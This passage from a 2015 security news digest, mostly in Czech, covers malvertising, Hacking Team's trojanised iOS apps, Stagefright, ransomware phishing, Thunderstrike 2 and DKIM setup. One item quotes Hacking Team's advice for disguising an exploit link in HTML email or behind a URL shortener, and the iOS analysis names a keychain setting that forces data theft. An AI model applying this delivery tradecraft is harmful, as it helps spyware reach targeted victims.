"The complexity of the online advertising economy makes it easy for malicious actors to abuse the system and get away with it. It is one of the reasons why we need to work very closely with different industry partners to detect suspicious patterns and react very quickly to halt rogue campaigns," added Malwarebytes' Jerome Segura.


Malicious advertisements surge! 260% spike in 2015
8.8.2015

RiskIQ announced at Black Hat USA 2015 its latest findings on the prevalence of malvertising across the nearly two billion publisher pages and 10 million mobile apps it monitors per day.

In the first half of this year the number of malvertisements has jumped 260 percent compared to the same period in 2014. The sheer number of unique malvertisements has climbed 60 percent year over year. Meanwhile, fake Flash updates have replaced fake antivirus and fake Java updates as the most commonly method used to lure victims into installing various forms of malware including ransomware, spyware and adware.

“The major increase we have seen in the number of malvertisements over the past 48 months confirms that digital ads have become the preferred method for distributing malware,” said James Pleger, Director of Research at RiskIQ. “There are a number of reasons for this development, including the fact that malvertisements are difficult detect and take down since they are delivered through ad networks and are not resident on websites. They also allow attackers to exploit the powerful profiling capabilities of these networks to precisely target specific populations of users.”

The rise of programmatic advertising, which relies on software instead of humans to purchase digital ads, has generated unprecedented growth and introduced sophisticated targeting into digital ad networks.

This machine-to-machine ecosystem has also created opportunities for cyber criminals to exploit display advertising to distribute malware. For example, malicious code can be hidden within an ad, executables can be embedded on a webpage, or bundled within software downloads.

RiskIQ’s global proxy network of virtual software users scans billions of websites and millions of mobile apps per day for the presence of malvertisements, malware and malicious/copycat apps.

The company’s most recent research into the prevalence of malvertisements yielded the following findings:
Malvertisements have increased 260 percent on a pro-rated basis in the first half of 2015 (450,000) compared to all of 2014 (250,000)
The number of unique malvertisements in June of 2015 (80,000) has jumped 60 percent in compared to the same period last year (50,000)
The most common lure used in malvertisements in 2015 has been fake Flash updates, in 2014 the top lures were fake antivirus updates and fake Java updates
In 2014, there was significantly more exploit kit activity (which silently installs malware without end user intervention) than fake software updates that require user consent
In 2015, fake software updates have surpassed exploit kits as the most common technique for installing malware.


V Česku jsou stále stovky ohrožených routerů

7.8.2015 Hacking
V České republice bylo v uplynulém roce zaznamenáno několik útoků na počítačové routery – brány do světa internetu. Kyberzločinci při svých nájezdech využili zranitelnosti známé jako „rom-0“. Podle analýzy Národního bezpečnostního týmu CSIRT.CZ počet napadnutelných přístrojů v tuzemských domácnostech neustále klesá, stále jich však jsou stovky.
Ještě v polovině května loňského roku trpěl chybou více než milión routerů po celém světě, z toho více než pět tisíc jich bylo v Česku. Už o tři měsíce později ale klesl počet napadnutelných přístrojů v globálním měřítku pod milión a na méně než čtyři tisíce v tuzemsku.

A tento trend pokračuje i v letošním roce, i když situace ani zdaleka není tak růžová, jak by se na první pohled mohlo zdát. „Od prvotního kontaktu s chybou ‚rom-0‘ a od našeho prvního měření v květnu 2014 do posledního v červenci 2015 klesl v ČR počet napadnutelných boxů z 5368 v květnu 2014 na současných 1561. Pokles je tedy o necelých 71 %,“ uvedl Tomáš Hlaváček, programátor a výzkumník sdružení CZ.NIC, které provozuje národní bezpečnostní tým CSIRT.

Stejný trend je patrný také ze světových statistik. „Ve světovém měřítku byl pokles z 1 225 514 (květen 2014) na současných 330 397, což je 73 %,“ doplnil Hlaváček.

„Existují však i ojedinělé regiony, kde naopak došlo k přírůstku napadnutelných zařízení. Nejedná se ale naštěstí o velká čísla a výskyt nových napadnutelných boxů lze připsat výprodeji skladových zásob routerů se starým firmwarem a jisté lehkovážnosti či neznalosti,“ uzavřel programátor a výzkumník sdružení CZ.NIC.

Útočník může přesměrovat adresy
Otestovat bezpečnost routeru je možné na webu rom-0.cz. Na zmiňovaných stránkách stačí kliknout na tlačítko Test, vše ostatní běží automaticky. Během necelé minuty pak program vyhodnotí, zda router mohou zneužít kyberzločinci.

Na webu rom-0.cz stačí kliknout na tlačítko Test, vše ostatní běží automaticky.
FOTO: Novinky

Všichni lidé, kteří používají síťové prvky s touto chybou, jsou v ohrožení. Pokud se útočník dostane k administračnímu rozhraní jejich routeru, může snadno přesměrovat adresy. Místo serverů Seznam.cz nebo Google.com se poškozeným zobrazí hláška o nutnosti instalace flash playeru. Místo té se ale do PC stáhne virus.


iOS Masque Attack Weaponized: A Real World Look
7.8.2015

We previously have described the threats of Masque Attacks against iOS in a series of blogs [2,3,4]. Up until now, these attacks had never bee seen carried out in the wild, highlighting that advanced threats were not utilizing mobile to carry out their attacks despite rapid user adoption. However, FireEye has recently uncovered 11 iOS apps within the Hacking Team’s arsenals that utilize Masque Attacks, marking the first instance of targeted iOS malware being used against non-jailbroken iOS devices.

These apps are reverse engineered and weaponized versions of popular social networking and messaging apps, including: WhatsApp, Twitter, Facebook, Facebook Messenger, WeChat, Google Chrome, Viber, Blackberry Messenger, Skype, Telegram, and VK. Unlike the normal versions of these apps, they come with an extra binary designed to exfiltrate sensitive data and communicate with a remote server. Because all the bundle identifiers are the same as the genuine apps on App Store, they can directly replace the genuine apps on iOS devices prior 8.1.3.

Note that the bundle identifiers are actually configurable by the remote attackers. So for iOS devices above 8.1.3, although the Masque Attack vulnerability has been fixed (apps with the same bundle identifiers cannot replace each other), the attackers can still use a unique bundle identifier to deploy the weaponized app. In this scheme, the attack falls back to the Enpublic attack[1].

Fig 5. shows an example of the runtime behavior of the repackaged Facebook app. Upon launching the app, three consecutive alerts are popped up asking for permission of access the Photo, Microphone, and Contacts.

As shown in Fig. 6, those malicious Masque Attack apps leverage the LC_LOAD_DYLIB command of the MachO format to inject a malicious dylib (named “_PkgSign”) into the genuine executable file. This dylib implements the core malicious logic.

Since each Masque Attack app has different internals, the dylib needs to hook different methods for data exfiltration. As listed in Table 1, the malicious dylib maps each Masque Attack app an id prefixed by “TIGI000” and a customized class for managing the malicious behaviors controlled by the remote server.

APPID Malicious Manager Class Name Bundle ID of Masque Attack App
TIGI00001

POViewConnection

com.skype.skype

TIGI00002

POViewAsynService

com.viber

TIGI00003

POViewRegistration

net.whatsapp.WhatsApp

TIGI00004

_bvbcccyytr

com.facebook.Facebook

TIGI00006

POViewDataManager

com.facebook.Messenger

TIGI00008

POViewLogger

com.google.chrome.ios

TIGI00009

VKMessageManager

com.vk.vkclient

TIGI00010

TelegramManager

ph.telegra.Telegraph

TIGI00011

BBMManager

com.blackberry.bbm1

TIGI00012

WechatManager

com.tencent.xin

TIGI00013

TwitterManager

com.atebits.Tweetie2

...

...

...

Table 1: The mapping of handler class to the bundle id of each Masque Attack app

The injected dylib hooks 52 sensitive functions of 38 classes in the genuine executables. All of the hooked class methods correspond to key functionalities of the genuine apps. For example, hooking “[SKPConversation OnMessage:andMessageobjectid:]” to intercept messages in Whats App and “[VideoVoipCallerView OnBeginTalk:]” to start recording a outgoing voice call in Wechat App.

The injected dylib is acting as part of the apps executable file and can read/modify the all data in the app’s containers to gather sensitive information and send them to the remote server. The information includes:

Voice call recording in Skype, Wechat, etc.
Text message intercepting in Skype, Whats App, Facebook messenger, etc.
Chrome visited website history
Phone call
SMS/iMessage content
Precise GPS coordinate recording in background
Contacts information
Photos
Of special note, the dylib has the capability to upload data only from targeted users. It sends the IMEI to the remote server to check if the target device is of interest. The server will instruct whether to exfiltrate data or not. However, we have found logic to bypass the check if the SKIP-LICENSE key is set to 1 in the keychain. So local colludes can set this value to 1 to force data exfiltrating if they find the victim of value.

Finally, all data are reassembled in Json format and sent to the remote server.Fig. 8 shows an example of the uploaded data (actual values anonymized). The items field contains different types of data such as the chat data for the communication apps, geo location information, phone call history, etc.

Configurable via URL scheme

The remote server and malicious behaviors are configurable through URL. In each repackaged sample, we found a customized URL scheme is added to the Info.plist file. The URL schemes follow the pattern “TIGI0000X://”, which is exactly the same as APPID column listed in Table 1.

By hooking the “application:openURL:sourceApplication:annotation:” function, the malicious dylib can parse the configure data when the URL scheme is opened. The configure data is serialized in JSON format, encoded in Base64 and appended right after the customized URL scheme. The attacker can lure the targeted victims to click such URLs via SMS/Email/Web page on the device and customize targeted configurations such as the remote server.

Conclusion

From the attack tools leaked from the Hacking Team, we have now seen that advanced targeted attacks against iOS devices have begun to emerge. We encourage all iOS users to always update their devices to the latest version of iOS and pay close attention to the avenues that they download their apps.

References

[1] VB2014 paper: Apple without a shell – iOS under targeted attack

[2] iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking

[3] Masque Attack: All Your iOS Apps Belong to Us

[4] Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking


Google investuje do bezpečnosti Androidu, chystá se vypustit dosud největší záplatu

7.8.2015 Bezpečnost
Google se chystá vypustit jednu z dosud největších záplat pro Android, podle zástupce společnosti Adriana Ludwiga dokonce tu vůbec největší.
Google investuje do bezpečnosti Androidu, chystá se vypustit dosud největší záplatu

„V následujících dnech aktualizujeme stovky milionů zařízení. To je neuvěřitelné,“ říká.
A co má aktualizace řešit?

Předně riziko, že se vám do systému někdo nabourá prostřednictvím takzvaného Stagefrightu, bezpečnostní chyby systému, která umožňuje jeho ovládnutí bez jakékoliv interakce uživatele.

Stačí, aby někdo odeslal speciálně upravenou multimediální zprávu, jejíž spuštění umožní škodlivému kódu získat kontrolu nad telefonem. A vzhledem k tomu, že u mnohých aplikací, jako je například Hangouts, je automatické stahování obsahu nastaveno jako výchozí, je podle odborníků Stagefrightem ohroženo až pětadevadesát procent zařízení pracujících na systému Android.

Z tohoto důvodu Google například v nedávné době aktualizoval aplikaci Messenger, která už po uživateli vyžaduje interakci, chce-li přehrát obdržené video. Další bezpečnostní aktualizace mají následovat v nejbližších dnech, Google na nich spolupracuje přímo s výrobci chytrých telefonů jako jsou Sony, Samsung, LG či HTC.

Společnosti se zavázaly, že svým zákazníkům budou posílat bezpečnostní patche každý měsíc a to po dobu přinejmenším tří let od vydání daného modelu. Ludwig za Google zároveň přislíbil, že společnost chystá výrazné investice do bezpečnosti Androidu, který by tak měl být v budoucnu ještě důkladnější v blokování potenciálně škodlivých aplikací.


Hacking Team dokázal měnit běžné aplikace na iOSu za šmírovací

7.8.2015 Incidenty

Hacking Team měl pozměněné mobilní aplikace Facebooku, WhatsAppu, Viberu, Telegramu, Skypu i Googlu Chrome na iOSu. Poměrně snadno to šlo až do S pomocí knihoven vsouvaných do jinak normálně vypadajících a chovajících se aplikací mohli hackeři z telefonu získávat informace a data – nahrávat hovory, sledovat posílané zprávy, získat historii webu, sledovat telefonáty, SMS/iMessage, zaznamenávat polohu, stáhnout kontakty či získat fotky.

Zajímavé na pozměněných aplikacích je to, že dostat do telefonu je bylo možné vydáváním se za zcela jinou aplikaci, kterou tam uživatel telefonu dobrovolně vpustil a následně došlo k záměně původní aplikace za tuto pozměněnou – útok tohoto druhu byl opraven v iOSu ve verzi 8.1.3. Což sice znemožní tento druh útoku, ale vpašovat do mobilu náhradu jakékoliv aplikace je stále možné a není ani potřeba jailbreak – stále je jediné nutné, aby uživatel klikl na instalační odkaz v poště.

Výhoda vydávání se za Facebook (či jakoukoliv jinou aplikaci) je zřejmá, uživatel takovéto aplikace zcela určitědovolí přístup k fotografiím, mikrofonu, kontaktům a dalším informacím. Útočníci tak mohli snadno překonat zábrany, které iOS klade do cesty škodlivým aplikacím.

Podle iOS Masque Attack Weaponized: A Real World Look měl Hacking Team připravených celkem jedenáct takovýchto pozměněných aplikací. Vedle výše jmenovaných jde ještě zejména o WeChat, BlackBerry Messenger, VK, Twitter či Facebook Messenger.

Hacking Team navíc v aplikacích pečlivě hlídal, aby aplikace byla aktivní pouze na telefonu s předem určeným IMEI. Jak ale FireExe upozorňují, toto omezení bylo možné vypnout a aplikace tak bylo možné použít a aktivovat kdykoliv a na kohokoliv.


První větší várka oprav pro Windows 10 dorazila do Windows Update

6.8.2015 Zranitelnosti

Po necelém týdnu na trhu je tu první velká aktualizace pro Windows 10.
Aktualizace pro Windows 10 z 5. srpna 2015 (KB3081424) obsahuje i bezpečnostní opravu z 29. července (KB3074683) a připravte se na delší stahování (přes 300 MB) a poměrně značné množství opravovaných programů a souborů, včetně nutnosti restartovat počítač. A zapomeňte na to, že by Microsoft v popisu aktualizace nějak blíže určil, co vlastně opravuje.

Zmíněný bezpečnostní balíček nicméně opravuje MS15–074, MS15–078, Microsoft Security Advisory 2755801 a Adobe Security Bulletin APSB15–18. Poslední jmenované opět opravuje vážné chyby ve Flashi (kritická chyba umožňující převzít kontrolu nad počítačem), tedy v něčem, co byste prioritně měli z počítače odstranit. MS15–078 je také kritická oprava, pro změnu ovladače pro fonty od Microsoftu, která také může vést k ovládnutí počítače. A MS15–074 se týká instalační služby Windows, zneužitelné podobným způsobem.

Nezapomeňte, pokud máte Windows 10 Home nebo jste si nenastavili Windows 10 Pro, aby nedošlo k automatické instalaci restartu, tak se možná budete divit. Viz Automatické aktualizace Windows 10 — ztráta vlády nad počítačem? a Jak je to s Windows 10 a zásadním útokem na naše soukromí

Stejně jako update na Windows 10 doprovázejí u některých uživatelů problémy, i instalace této první velké kumulativní aktualizace se některým uživatelům nedaří. Lze tak soudit podle komentářů na Internetu, byť žádné řešení či bližší určení z nich nezjistíte. Můžete tedy zkusit štěstí, nebo si před aktualizací pro jistotu udělat kompletní zálohu a vlastní bod obnovy.


Vypnout bezdrátová připojení nestačí

6.8.2015 Zabezpečení
Ani vypnutí wi-fi nedokáže zabránit bezdrátovému úniku dat. Vědci našli způsob, jak na dálku přečíst data přenášená mezi procesorem a pamětí počítače.
pátek 31. července 2015, 16:07
Nenápadný malware v napadeném počítači dokáže znásobit elektromagnetické vlnění, související s přenosem dat mezi procesorem a pamětí počítače do takové míry, že přenášená data je možné zachytit i na vzdálenost 30 metrů.

To v případě využití specializovaného přijímače; na menší vzdálenost stačí jakýkoli smartphone, vybavený příslušnou aplikací. Objem dat, který je možné takto přenést a zachytit, je jen velmi limitovaný. Na citlivé údaje typu jméno a heslo však podle autorů objevu stačí.

Pokud se zjištění vědců - objev učinili výzkumníci z izraelské univerzity Bena Guriona v Tel Avivu - potvrdí jako skutečná hrozba, bude to představovat další ohrožení IT bezpečnosti. Dosud měli bezpečnostní experti za to, že počítače, připojené do zabezpečené sítě a se zakázanou bezdrátovou konektivitou, není potřeba dále chránit. Nyní se však může ukázat, že je nebezpečné, aby se v blízkosti chráněných počítačů vyskytovaly nekontrolované smartphony.


Virů pro mobily je třikrát více než v zimě. Cílí především na mobilní bankovnictví

6.8.2015 Viry
Počet nových škodlivých programů pro mobilní zařízení se v druhém čtvrtletí proti předcházejícím třem měsícům ztrojnásobil na téměř 300 000. Odborníci zároveň odhalili jeden milión instalačních balíčků k mobilním hrozbám, což je sedminásobek proti prvnímu čtvrtletí. Uvedla to antivirová firma Kaspersky Lab.
Hlavním terčem hrozeb zůstalo mobilní bankovnictví. Ve druhém čtvrtletí se například objevila nová verze trojského koně Trojan-SMS.AndroidOS.OpFake.cc, která byla schopná napadnout 114 bankovních a finančních aplikací, což je čtyřnásobné množství proti předchůdci ze začátku roku. Hlavním cílem tohoto trojanu bylo ukrást přihlašovací údaje uživatele a napadnout jimi, kromě jiného, mnoho populárních e-mailových aplikací.

Objevilo se 5,9 miliónu upozornění na pokusy škodlivých programů ukrást peníze skrz online přístup k bankovním účtům. To je o 800 000 méně než v prvním čtvrtletí. Nejvíce uživatelů podlehlo bankovním trojským koním v Singapuru (5,3 procenta). Následují Švýcarsko, Brazílie, Austrálie a Hong Kong. Většina zemí v první desítce je technologicky vyspělá nebo má rozvinutý bankovní systém, což přitahuje pozornost kyberzločinců.

Bankovní viry útočící na klienty online bankovních systémů tvořily 83 procent všech finančních hrozeb. Kromě nich finanční hrozby představovali také takzvaní bitcoinoví horníci, tedy programy, které používají výpočetní zdroje počítačů obětí k tvorbě bitcoinů, a dále zloději bitcoinových peněženek.

V průměru 24 procent uživatelů internetu po celém světě podlehlo alespoň jednou webovému útoku. To je o 2,4 procentního bodu méně než v prvním čtvrtletí. Počet unikátních škodlivých objektů klesl o osm procent na 26 miliónů. Nejrozšířenější byl skript AdWare.JS.Agent.bg, aplikovaný reklamními programy do libovolných webových stránek.


Další nebezpečný mailový útok: nakažené přílohy se maskují jako faktury či smlouvy

6.8.2015 Kriminalita

Smlouvy, nejasná faktura a různé další varianty sociálního inženýrství vás mají přimět k otevření přílohy, v té je klasický trojský kůň.
Zvládnutá čeština, jen ta jména odesílatelů jsou divná, v těch se totiž česká jména a příjmení nevyskytují. V podpisech uvedeny české firmy s velmi pravděpodobně reálnými kontakty. V příloze dokument z Wordu, který je „personalizovaný“ na příjemce. Pokud ho otevřete, čeká na vás klasický trojský kůň, který ale prozatím detekují jenom některé antiviry (Kaspersky například nikoliv, Windows Defender také ne). Ty, které ho poznají, ho ale tak jako tak označují obecným označením (HEUR.VBA.Trojan či Trojan.Script.Agent.djfdmm).

Variant je řada, například „v príloze zasílám smlouvu vc. rozpoctu. Prosím o její doplnení a zaslání zpet, at mohu vyhotovit originály“ nebo „na základe našeho telefonního rozhovoru si Vám dovoluji zaslat podrobné informace o – VELMI DULEŽITÉ – akci Ceského cerveného kríže pro deti a jiste nejen pro ne! Jedná se o prírucku "První pomoc není veda“, „posílám návrh textové cásti zadávací dokumentace.“ či „Dovolim si preposlat fakturu za jun 2015 + pohyblivu odmenu. Poprosim o sprocesovanie asap.“.

Jeden a ten samý exemplář navíc máte šanci dostat na všechny e-maily, které se kdy podařilo z dané domény spammerům získat, včetně toho, že zkoušejí jakékoliv obecné e-maily, které většinou existují. Je ale běžné, že na jeden mail dorazí tentýž mail v průběhu několika minut v řadě exemplářů.


Pozor na falešný upgrade Windows 10, obsahuje vyděračský software

6.8.2015 Viry
Pozor na falešný upgrade Windows 10, obsahuje vyděračský softwareVčera, Milan Šurkala, aktualitaUvedení nového operačního systému Windows 10 se chytly také nekalé živly. Pokud vám přijde mail s nabídkou bezplatného upgradu na Windows 10, buďte obezřetní. Může se totiž jednat o vyděračský software, který bude požadovat výkupné. Distribuce nového operačního systému Windows 10 se chytli nebezpeční útočníci, kteří posílají e-maily obsahující nabídku bezplatného upgradu. Tento mail ale nenainstaluje Windows 10, nýbrž aktivuje vyděračský software (ransomware) CTB-Locker, který zašifruje data na disku a vyžaduje výkupné za jejich odemčení.

Oběti mají na zaplacení výkupného v Bitcoinech pouhých 96 hodin (a žádnou jistotu, že jejich data budou po zaplacení skutečně odemčena). E-mail navíc vypadá poměrně věrohodně. Používá vzhledu e-mailů od Microsoftu, jeho hlavička je "Windows 10 Free Update" a uvedená e-mailová adresa je "update@microsoft.com". Ve skutečnosti je ale e-mail poslán odněkud z Thajska. Aby vypadal ještě věrohodněji, dole zobrazuje hlášku, že byl zkontrolován antivirovým softwarem a je bezpečný. Pokud vám tedy tento e-mail přišel, rozhodně nespouštějte přílohu v něm umístěnou!


Jaké exploity objednala česká policie? Maily Hacking Teamu jsou na WikiLeaks

5.8.2015 Incidenty

Na Wikileaks.org jsou kompletní e-maily z úniku po hacku Hacking Teamu. Zásadním problémem pro Česko je, že prozrazují příliš mnoho o aktivitách Policie.
Pokud si chcete prostudovat komunikaci mezi Hacking Teamem a společností Bull, včetně řady zábavných požadavků na vytvoření exploitů (namátkou žádost o exploity na stránky Komerční banky, Seznam.cz, Otomoto.cz, Parlamentních listů, atd.), stačí jít na search.wikileaks.org/advanced, zaškrtnout pouze „Hacking Team“ v omezení hledání, a pak už jenom zkoušet a zkoušet. Případně hledat přímo pomocí wikileaks.org/hackingteam/emails/.

Pozor, je to hodně dlouhé čtení, které vám vystačí na hodně dlouhou dobu. Dozvíte se v něm řadu věcí, včetně toho, že české „vysoké školy“ vyvíjejí exploity a byl zájem je zahrnout do řešení od HT. Desítky e-mailů probírají cenu, dodací podmínky, školení „zákazníka“ v tom, jak konkrétně hackovat, jak do stránek vsouvat útočné kódy nebo jak uživateli zablokovat přehrávání YouTube, aby si stáhl falešný Flash.

The attachment contains TXT file with the infecting URL.

Don't put this link on public websites or social networks (Facebook, Twitter), it is unsafe for you and it could be triggered by automatic bots. For delivering it, to a real target, we suggest you to create an html e-mail with an hyperlink to this URL, because otherwise it might look malicious: in the attachment you will also find a sample html code you can use to insert the link and mask it in a html email. For sending html mail via web-mail (eg: gmail) please refer to the message previously posted.

If html sending is not possible (eg: via Skype chat), we suggest to use tinyurl (tinyurl.com) to mask the real URL. The exploit will be available only for a limited period of time.

Požadavky na exploity, tedy na vytvoření specifického řešení, které v uniklých mailech najdete, se týkají vytváření útočného kódu pro specifické weby, prohlížeče, ale také pro Microsoft Word či Power Point.

Bez zacházení do detailů je dost zřejmé, že pokud si tuto komunikaci mezi Policií ČR a „servisním“ portálem Hacking Teamu přečtou například obhájci lidí, kterých se „hackování“ a sledování týkalo, budou mít informace, které mohou celý výsledek vyšetřování ohrozit. Mimo požadavků najdete v e-mailech i odpovědi, včetně připravených exploitů, informací o tom, jak je nasadit a čeho se vyvarovat.

Je hodně zvláštní, že komunikace obsahující velmi citlivé a konkrétní informace týkající se kriminálního vyšetřování probíhala v nezabezpečené podobě. Celé to navíc vyvolává řadu dalších otázek. K umístění některých exploitů musela mít policie spolupracující subjekt – řekněme, že pokud by chtěla umístit exploit přímo na webové stránky nějakého média, bylo by to bez spolupráce dost nepravděpodobné. Byť samozřejmě můžete uvažovat nad tím, že by mohlo dojít nejprve k hacknutí média, a až poté k umístění exploitu.

Je tu samozřejmě také varianta, že policie má přístup přímo k internetové komunikaci (ale nemá přístup ke koncovému zařízení sledované a vyšetřované osoby) a někde „cestou“ dokáže podvrhovat obsah. Což je ale nakonec stejně alarmující věc, jako ta předchozí.

Je také milé vidět, jak aktivní jsou české univerzity či vysoké školy, když jde o otázku hackingu. Ale tady se opět nabízí otázka, jak asi bude těm, kteří chtěli obchodovat s Hacking Teamem, když si uvědomí, že jejich práce mohla dobře sloužit represivním režimům ke stíhání disidentů, potlačování občanských svobod a řadě dalších věcí, které jsou s naším pojetím světa dost neslučitelné.

Bude zajímavé sledovat, kolik z řešených případů, které se objevují rozpoznatelné v e-mailech uniklých z Hacking Teamu, bude tímto únikem zmařeno. A zda za toto fatální selhání bude někdo zodpovědný.


První malware Thunderstrike 2, který útočí na firmwary Apple Mac

5.8.2015 Viry
První malware Thunderstrike 2, který útočí na firmwary Apple MacVčera, Milan Šurkala, aktualitaPočítače Apple Mac jsou obecně považovány za bezpečnější než klasická PC. Přesto byl vědci vytvořen nový druh malwaru, který dokáže tyto počítače napadnout, a to dokonce jejich firmware. Ani přeinstalování operačního systému tak nepomůže. Protože klasických PC je mnohem více než Maců, není divu, že jsou také častěji napadány a obecně jsou brány jako méně bezpečná platforma. Přesto se ukázalo, že ani Macy nejsou úplně bezpečné a v podstatě většina zranitelností, na které trpí PC, sužuje i tyto počítače. O výzkum v této oblasti se zasadili vědci Xeno Kovah (bezpečnostní konzultant a majitel společnosti LegbaCore) a Tramell Hudson (bezpečnostní inženýr).

Ti totiž vytvořili malware Thunderstrike 2, který je schopen infikovat samotný firmware těchto zařízení (EFI). Tato část počítače (obdoba BIOSu u PC) totiž není kontrolována antivirovými programy a navíc i po reinstalaci operačního systému tak škodlivý software zůstává v počítači. Řešením je buď takový počítač vyhodit nebo přeflashovat samotný firmware počítače, což nemusí být zrovna snadná záležitost. Problém je způsoben tím, že výrobci obvykle tuto část počítače příliš nechrání a nebývá dostatečně zabezpečena proti přepsání nesprávným firmwarem, který nepochází od výrobce.

Zajímavostí je i to, že už v minulém roce byl proveden výzkum na téma bezpečnosti BIOSů a nyní se ukázalo, že z šesti bezpečnostních děr, které trápí klasická PC, jich pět ohrožuje i Apple Mac. Jedna oprava už spatřila světlo světa, druhá byla opravena částečně. Tři je ještě pořád nutno vyřešit. I tyto bezpečnostní díry byly použity ke tvorbě malwaru Thunderstrike 2. Ten je zákeřný nejen v tom, že se schová do firmwaru, ale také tím, že se velmi snadno může šířit dál např. pomocí úpravy firmwarů USB disků, externích disků nebo třeba některých síťových prvků (např. přes Apple Thunderbolt Ethernet adapter).


Máte v počítači malware HackingTeamu? Tenhle nástroj to zjistí

4.8.2015 Incidenty

Ani dnes neopomeneme únik dat společnosti HackingTeam. Výzkumníci ze společnosti Rook Security totiž vytvořili nástroj pojmenovaný Milano, který slouží k detekci malwaru HackingTeamu na cílovém zařízení. Na tom může běžet jak operační systém Windows, tak OS X nebo nějaký z unixových operačních systémů. Malware je možné hledat ve dvou odlišných módech - rychlý scan a podrobný scan. Na rozdíl od rychlého scanu, který trvá několik sekund, podrobný scan může v závislosti na systému trvat i hodinu.

Nástroj aktuálně hledá více než 300 souborů a toto číslo se bude zvyšovat s postupující prací na analýze dat HackingTeamu. A právě ve způsobu hledání těchto souborů se liší typy scanování. Rychlý scan hledá podle názvů souborů a v případě shody porovná hashe souborů, kdežto podrobné hledání porovnává hashe všech souborů v systému proti hashům souborů HackingTeamu.


Tvůrci virů nabízejí Windows 10, místo toho si pořídíte ransomware

4.8.2015 Viry

Očekávatelné se stalo skutečností, maily nabízející upgrade na Windows 10 jsou používány šiřiteli ransomare.
Pro ty, co čekají až se jejich „rezervace Windows 10“ promění v nabídku aktualizace ve Windows Update, to může být docela lákavé – v mailu dostanou něco, co vypadá jako e-mail od Microsoftu informující o tom, že se dočkali. Pokud ovšem budou pokračovat podle pokynů v mailu, dostane se do jejich počítače zpravidla ransomware. Tedy virus, který nevydá obsah počítače, dokud nezaplatí výkupné.

E-maily navíc „vypadají“ dost podobně, jako aktuálně používaný vizuální styl Microsoftu. Jak ale uvádí Cisco v Your Files Are Encrypted with a “Windows 10 Upgrade” pozornější příjemce by si mohl všimnout chyb v textu. Pro případné uklidnění příjemců nechybí ani obligátní informace o tom, že e-mail byl zkontrolován antivirovým programem – což je něco, co stále některé antivirové programy dělají, ačkoliv už prakticky celé desetiletí víme, že to byl jeden z nejzásadnějších omylů a tvůrci virů šířených e-mailem toto rádi využívají.

Výsledkem e-mailu je stažení ZIPu, v němž se skrývá klasické EXE – nic nového, ale přesto jde o poměrně úspěšnou taktiku. Výsledkem spuštění je zobrazení opravdu kreativní barevné zprávy o tom, že soubory jsou šifrovány přes CTB-LOCKER doprovázené časovým limitem 96 hodin, po které všechny soubory budou zašifrovány nenávratně.

Na CTB-Lockeru v tomto případě je zajímavá řada věcí – používání RSA asymetrického šifrování, využití C2 (Command and Control, ovládací sítě) založeného na hacknutých webech s WordPressem a poměrně značný objem síťové komunikace. Samotná komunikace s řídícími servery probíhá přes port 21, tedy port vyhrazený pro FTP a velmi pravděpodobně tedy průchozí přes případný firewall.


Zatočte se spamem (2)

4.8.2015 Spam
Není žádnou novinkou, že velkou část e-mailových zpráv, které se v dnešní době rozesílají, tvoří spam. Samotný protokol SMTP totiž umožňuje nastavit libovolnou e-mailovou adresu odesílatele. Toho se často zneužívá nejen v případě spamu a phishingu, ale například také při podvodech, při nichž se pachatel vydává za někoho, kým není.

DKIM (DomainKeys Identified Mail), popsaný ve standardu RFC 6376, validuje obsah zprávy. Tato metoda ověření těla zprávy umožňuje ověřit pravost odesílatele. Zajímavé je, že DKIM nebyl původně zamýšlený jako nástroj proti spamu, přesto v boji proti tomuto nešvaru pomáhá.

Pokud by došlo k plošnému nasazení této metody, donutila by odesílatele spamu spojit obsah zprávy se skutečnou zdrojovou doménou. V hlavičce zprávy se v případě použití technologie DKIM objeví položka DKIM – Signature.

Příjemce zprávy se následně dotazuje na doménu odesílatele a ověřuje, zda se podpis ve zprávě shoduje s veřejným klíčem uloženým v DNS záznamu domény odesílatele.

Z toho vyplývají dva procesy, které jsou součástí služby MTA (Mail Transfer Agent). Jde o podepsání zprávy na straně odesílatele a její následující ověření na straně příjemce.

Pro implementaci DKIM je třeba vygenerovat jeden pár klíčů. Soukromý klíč se uloží na e-mailovém serveru odesílatele a bude sloužit k podepisování zpráv. Do DNS záznamů se pak přidá TXT RR záznam obsahující nastavení DKIM a samotný veřejný klíč.

Implementace DKIM

Pokud chcete kontrolovat DKIM záznamy u příchozí pošty, je třeba tuto kontrolu na e-mailovém serveru nastavit. Jestliže používáte SpamAssasin pro povolení kontroly DKIM záznamů na příchozí poště, stačí v souboru local.pre zrušit zakomentování řádku.

loadplugin Mail::SpamAssassin::Plugin::DKIM

Zároveň je ale třeba nainstalovat balíček Perl skriptů, které budou sloužit jako DKIMProxy.

apt-get install libmail-dkim-perl

Dále je u DKIM nutné definovat politiku pro odchozí (DKIMproxy.out) i příchozí (DKIMproxy.in) zprávy. Výchozí skóre pro označení podepsaných zpráv je poměrně nízké, protože odesílatelé spamu si mohou teoreticky zaregistrovat vlastní doménu a v ní DKIM implementovat.

V praxi však to není zcela běžné, protože v okamžiku, kdy začne odesílatel spamu zprávy podepisovat, víme jistě, že odesílatelem byla daná doména, a můžeme tedy příjem pošty z této domény zablokovat.

DKIM Proxy byl primárně určený pro Postfix, měl by ale fungovat i s jinými e-mailovými servery. Více o fungování a možných nastaveních najdete přímo v manuálu DKIMProxy.

Další možností je OpenDKIM, který implementuje jak službu DKIM, tak aplikaci na bázi „milter“ (mail-filter), jež pracuje jako plug-in ve všech MTA, které jsou schopné ji rozpoznat.

Pokud server příjemce kontrolu DKIM nevykonává, část hlavičky s DKIM podpisem se ignoruje a zpráva se přijme. Implementace DKIM tedy příjemce zpráv nijak neomezí – naopak si může být jist, že se doména odesílatele ověří.

Vzhledem k tomu, že jde o kontrolu DNS záznamů, je vhodné implementovat zároveň i DNSSEC, který zajistí správnost záznamů získaných z DNS, čímž zvyšuje důvěryhodnost celého systému.


Zatočte se spamem (1)

3.8.2015 Spam
Není žádnou novinkou, že velkou část e-mailových zpráv, které se v dnešní době rozesílají, tvoří spam. Samotný protokol SMTP totiž umožňuje nastavit libovolnou e-mailovou adresu odesílatele. Toho se často zneužívá nejen v případě spamu a phishingu, ale například také při podvodech, při nichž se pachatel vydává za někoho, kým není.

